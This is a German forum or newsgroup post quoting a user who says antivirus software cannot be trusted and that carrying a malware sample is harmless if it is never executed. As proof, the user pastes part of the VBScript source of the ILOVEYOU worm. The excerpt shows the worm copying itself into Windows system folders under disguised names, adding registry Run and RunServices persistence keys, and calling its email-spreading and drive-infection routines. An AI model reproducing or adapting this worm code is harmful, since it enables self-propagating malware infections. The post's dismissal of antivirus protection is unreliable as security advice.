> Die Tatsache daß in der Mail ein Schädling ist , ist vollkommen harmlos.
>
> Nur ausführen darf man den Schädling nicht.
>
> Nochmal: Wer auf den Schutz einer AV Software vertaut erlebt früher oder
> später sein Wunder. Gewiss ist daß jenes Wunder kommt.
>
> Ich habe z.B. für \"Ungläubige\" zu Demonstrationszwecken einen prominenten
> Schädling auf dem Rechner .
>
> Und was passiert??? - Nichts!!! 
>
> Hier zum Beweis ein Teil des Quelltextes.....
>
>
> if (rr>=1) then
> wscr.RegWrite \"HKEY_CURRENT_USER\\Software\\Microsoft\\Windows Scripting
> Host\\Settings\\Timeout\",0,\"REG_DWORD\"
> end if
> Set dirwin = fso.GetSpecialFolder(0)
> Set dirsystem = fso.GetSpecialFolder(1)
> Set dirtemp = fso.GetSpecialFolder(2)
> Set c = fso.GetFile(WScript.ScriptFullName)
> c.Copy(dirsystem&\"\\MSKernel32.vbs\")
> c.Copy(dirwin&\"\\Win32DLL.vbs\")
> c.Copy(dirsystem&\"\\LOVE-LETTER-FOR-YOU.TXT.vbs\")
> regruns()
> html()
> spreadtoemail()
> listadriv()
> end sub
> sub regruns()
> On Error Resume Next
> Dim num,downread
> regcreate
> \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\Run\\MSKernel32
> \",dirsystem&\"\\MSKernel32.vbs\"
> regcreate
> \"HKEY_LOCAL_MACHINE\\Software\\Microsoft\\Windows\\CurrentVersion\\RunServices\\Wi
> n32DLL\",dirwin&\"\\Win32DLL.vbs\"
> downread=\"\"
> downread=regget(\"HKEY_CURRENT_USER\\Software\\Microsoft\\Internet
> Explorer\\Download Directory\")
> if (downread=\"\") then
>
> ...
>
>
>
Ist das der Schädling?
Microsoft\\Internet\\Explorer
Archiv